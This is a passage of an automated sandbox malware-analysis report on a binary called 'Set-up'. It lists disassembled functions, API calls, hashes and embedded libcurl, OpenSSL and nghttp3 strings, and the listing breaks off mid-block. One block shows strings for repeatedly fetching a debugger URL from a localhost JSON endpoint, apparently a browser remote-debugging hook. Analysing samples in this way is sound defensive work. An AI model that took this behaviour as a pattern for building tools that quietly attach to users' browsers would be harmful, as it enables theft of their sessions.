                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: _time64memchrstrtol$ErrorLastrecvfromstrlen
                                    • String ID: %s (%d)$%s (%d) %s (%d)$%s (%ld)$Internal error: Unexpected packet$Malformed ACK packet, rejecting$Received too short packet$TFTP error: %s$blksize$blksize is larger than max supported$blksize is smaller than min supported$blksize parsed from OACK$got option=(%s) value=(%s)$invalid blocksize value in OACK packet$invalid tsize -:%s:- value in OACK packet$requested$server requested blksize larger than allocated$tsize$tsize parsed from OACK
                                    • API String ID: 3302935713-3407012168
                                    • Opcode ID: 32cf3a07c60ca8219b3fb189f47135a2fddcc601b5d58ad788bb3b944b5369b3
                                    • Instruction ID: 3e37faa2901f83c9ebe59c146e1e161b7a6b71ebd485c26762f05742d10bdbb6
                                    • Opcode Fuzzy Hash: 32cf3a07c60ca8219b3fb189f47135a2fddcc601b5d58ad788bb3b944b5369b3
                                    • Instruction Fuzzy Hash: 60E143B1A00305ABD7559B24DC85B7BB7E8EF84710F08852DFA5897292E774EE04CB93
                                    APIs
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000011,?,?), ref: 00D2A29A
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(0000000F,?,?), ref: 00D2A2C5
                                    • memmove.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,0000000F), ref: 00D2A2E3
                                      • Part of subcall function 00D2A5A0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000001,?,0000000F), ref: 00D2A5FC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: memcpy$memmove
                                    • String ID: i < blk->n - 1$i > 0$lblk->n <= NGHTTP3_KSL_MAX_NBLK - n$lblk->n >= NGHTTP3_KSL_MIN_NBLK + n$n > 0$nghttp3_ksl.c$node->blk->n == NGHTTP3_KSL_MIN_NBLK$rblk->n <= NGHTTP3_KSL_MAX_NBLK - n$rblk->n >= NGHTTP3_KSL_MIN_NBLK + n
                                    • API String ID: 1283327689-1606465060
                                    • Opcode ID: f158f2050abacf31d6ec9afe2ea8db3b24c7dda7370d3f2e1ea3a2989a76d636
                                    • Instruction ID: a04b3e1f6c552c5bd0e1c38ebbeca5385baa05f63fea093b3e4901ac8bdd8c16
                                    • Opcode Fuzzy Hash: f158f2050abacf31d6ec9afe2ea8db3b24c7dda7370d3f2e1ea3a2989a76d636
                                    • Instruction Fuzzy Hash: C2C11271A003119FC714DF0CD8C596AB7E9FFA8318F58852DE9498B285D770ED85CBA2
                                    APIs
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00CF2AD7
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00CF2B3D
                                    • sendto.WS2_32(?,?,?,00000000,?,00000007), ref: 00CF2D30
                                    • WSAGetLastError.WS2_32 ref: 00CF2D3A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: strlen$ErrorLastsendto
                                    • String ID: %lld$%s%c%s%c$0$Connected for receive$Connected for transmit$Internal state machine error$TFTP buffer too small for options$TFTP filename too long$TFTP finished$blksize$netascii$octet$tftp.c$tftp_send_first: internal error$timeout$tsize
                                    • API String ID: 3285375004-3063461439
                                    • Opcode ID: 853621b466972ae1f832e6e12aaed605ac21622e153c00f344ef8bb7cf9351e8
                                    • Instruction ID: ccdcd2f0cdabaaa118adb5e9edad99637cc77406aa7f7425c08d1b3490c6f0ac
                                    • Opcode Fuzzy Hash: 853621b466972ae1f832e6e12aaed605ac21622e153c00f344ef8bb7cf9351e8
                                    • Instruction Fuzzy Hash: 34E12631A00304ABD765AB24DC86F7B77A4AF50708F09856CFE189B293E772ED14D792
                                    APIs
                                    • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000040,?), ref: 00CA4749
                                    • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000005D), ref: 00CA48E5
                                    • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000003A), ref: 00CA491B
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00CA4963
                                    • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,0000000A), ref: 00CA4971
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00CA497B
                                      • Part of subcall function 00CA06F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00CA5663,?), ref: 00CA06F9
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00CA4A41
                                    • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,00000000), ref: 00CA4A63
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00CA4A6D
                                    • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000000), ref: 00CA4AE0
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00CA4AEA
                                    • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000000), ref: 00CA4B28
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00CA4B34
                                    • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000000), ref: 00CA4B76
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00CA4B80
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: _errno$strtoul$strchr$memchrstrlen
                                    • String ID: %ld$%u.%u.%u.%u$urlapi.c
                                    • API String ID: 102816355-2423153182
                                    • Opcode ID: 7c4f015fc2a54d036277c99b73d77b675ddb30cd374af8345508e83b699b4c51
                                    • Instruction ID: bd6118fe676fa7855f2f7867fb29aa568663eae83a40dfb3706fdcfb73ed42b5
                                    • Opcode Fuzzy Hash: 7c4f015fc2a54d036277c99b73d77b675ddb30cd374af8345508e83b699b4c51
                                    • Instruction Fuzzy Hash: E0D15AB19043026BE718AA25DC46B7B7BD89F92318F05443CF89987282F7B8DE14D792
                                    APIs
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,unknown,00000100), ref: 00CFC37A
                                    • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,Unknown error), ref: 00CFC476
                                    • WSAGetLastError.WS2_32 ref: 00CFC4AE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: ErrorLastmemcpystrcpy
                                    • String ID: No error$QUIC connect: %s in connection to %s:%d (%s)$QUIC connection has been shut down$SSL certificate problem: %s$SSL certificate verification failed$SSL_ERROR unknown$SSL_ERROR_SYSCALL$Unkn$Unknown error$erro$own $r$unknown
                                    • API String ID: 31095072-3036451936
                                    • Opcode ID: cb869ed83186e6246e1e74b22c2e0b67470068ffbe87f5bc82f095f29e5e2256
                                    • Instruction ID: a4949a87ead4833b5e95d1ad51d88bea8ce117bb403c721e8e1ec4205ddc438a
                                    • Opcode Fuzzy Hash: cb869ed83186e6246e1e74b22c2e0b67470068ffbe87f5bc82f095f29e5e2256
                                    • Instruction Fuzzy Hash: 2351AB71A0834C5FD710AB61DC81BBFBB90DF91304F14892DFA989B282E675E944CB83
                                    APIs
                                    • tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00F0EA90
                                    • _stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?,?), ref: 00F0EAD9
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00F0EB98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: _errno_stat64tolower
                                    • String ID: Calling OPENSSL_DIR_read("%s")$Given path=%s$calling stat(%s)$file:$file_open$file_open_dir$file_open_stream$localhost/$providers/implementations/storemgmt/file_store.c
                                    • API String ID: 3401003986-2019258128
                                    • Opcode ID: 33fbc544be4deff371fd5a399e524dbd332222169384afb972c77e003acce948
                                    • Instruction ID: 9857e0e1d8eee1a7309e2739d7ff467ec0ee2e48675f16ac35df96177ab6ab7a
                                    • Opcode Fuzzy Hash: 33fbc544be4deff371fd5a399e524dbd332222169384afb972c77e003acce948
                                    • Instruction Fuzzy Hash: 017107B5F44300ABE7207B20AC47F2A7BD5AF05724F484C29F985662C3EAB5E504F792
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: AUTH$CAPABILITY$Got unexpected imap-server response$L-IR$LOGINDISABLED$PREAUTH connection, already authenticated$SASL$STAR$STARTTLS$STARTTLS denied$STARTTLS not available.$TTLS
                                    • API String ID: 0-3171374047
                                    • Opcode ID: e1b49248dfc7010e174ca0ec623a4fe7adad2ae32069fcdd0a38d362154c6a85
                                    • Instruction ID: 578815f49d5a473db98ab38da92466350b94eb47bf3933f837784f0461649c7e
                                    • Opcode Fuzzy Hash: e1b49248dfc7010e174ca0ec623a4fe7adad2ae32069fcdd0a38d362154c6a85
                                    • Instruction Fuzzy Hash: 5BB16D71A043C09BDB229B27C885B7A77ACBF55704F18027DF8A947282E775AF40D792
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00C820D4
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00C822D0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: freemalloc
                                    • String ID: +N$@$All %d attempts to fetch debugger URL failed.$Attempt %d failed: %s$Failed to allocate memory for response.$Failed to initialize curl.$GET request succeeded on attempt %d.$Q$d$http://localhost:%d/json
                                    • API String ID: 3061335427-1249806554
                                    • Opcode ID: 73fe3a34673941e80fdd68a66f77ac80bf217415bd5a3898922828a4b5b19d28
                                    • Instruction ID: 8983c2c0dabce4d30ead7d8d979183a864dea9559c2c374355e6bfb6f2a1fef6
                                    • Opcode Fuzzy Hash: 73fe3a34673941e80fdd68a66f77ac80bf217415bd5a3898922828a4b5b19d28
                                    • Instruction Fuzzy Hash: 806193B49087099FDB00EFA8D48979EBBF4FF44318F11881DE988A7341D77899849F96
                                    APIs
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 00D2499C
                                    • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(!conn->server,nghttp3_conn.c,00000A08), ref: 00D24A0A
                                    • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(conn->server,nghttp3_conn.c,00000A2B,?), ref: 00D24A8E
                                    • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(pri->urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,00000A2C), ref: 00D24AA3
                                    • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(pri->inc == 0 || pri->inc == 1,nghttp3_conn.c,00000A2D), ref: 00D24AB8
                                    • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(conn->server,nghttp3_conn.c,00000A3E,?), ref: 00D24B1A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: _assert$memcpy
                                    • String ID: !conn->server$conn->server$nghttp3_conn.c$pri->inc == 0 || pri->inc == 1$pri->urgency < NGHTTP3_URGENCY_LEVELS
                                    • API String ID: 3718630003-1169204258
                                    • Opcode ID: 70ce223e36d4a96f3959106cbc75438a5b0fd8f174fe575c9c173fdea84f8b7c
                                    • Instruction ID: 6d657ca1348ce3a2d08f66c161fbd00a1ab738d8077b2ef4f56b1ca0c638cd25
                                    • Opcode Fuzzy Hash: 70ce223e36d4a96f3959106cbc75438a5b0fd8f174fe575c9c173fdea84f8b7c
                                    • Instruction Fuzzy Hash: C2511571A54325ABD720DE28BC01BAB77E9EFA931CF18452DFD9486181D770E980C7B2
                                    APIs
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,00CF8C0E,?), ref: 00E345E3
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dynamic,?,?,00CF8C0E,?), ref: 00E3460A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: strcmp
                                    • String ID: /data/curl-i686/lib/engines-3$DIR_ADD$DIR_LOAD$ENGINE_by_id$LIST_ADD$LOAD$OPENSSL_ENGINES$crypto/engine/eng_list.c$dynamic$id=%s
                                    • API String ID: 1004003707-1524119518
                                    • Opcode ID: 96062f8046138ec7a3068c49d74d2a973e2f743d58b9adc02d412936ec592cf0
                                    • Instruction ID: 31d50809075f1c28e02d230da5e9ce1addc9f0f3e92cc01f1616e2ce27be91ca
                                    • Opcode Fuzzy Hash: 96062f8046138ec7a3068c49d74d2a973e2f743d58b9adc02d412936ec592cf0
                                    • Instruction Fuzzy Hash: 5A4181F5F9031066E63036657C0BF6639DC4B52F49F092029FE44B52D3FAA5B924C1A2
                                    APIs
                                    • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000005D), ref: 00CE6884
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00CE68AC
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00CE68C1
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00CE6973
                                    • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002F), ref: 00CE6983
                                    • atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001), ref: 00CE6995
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
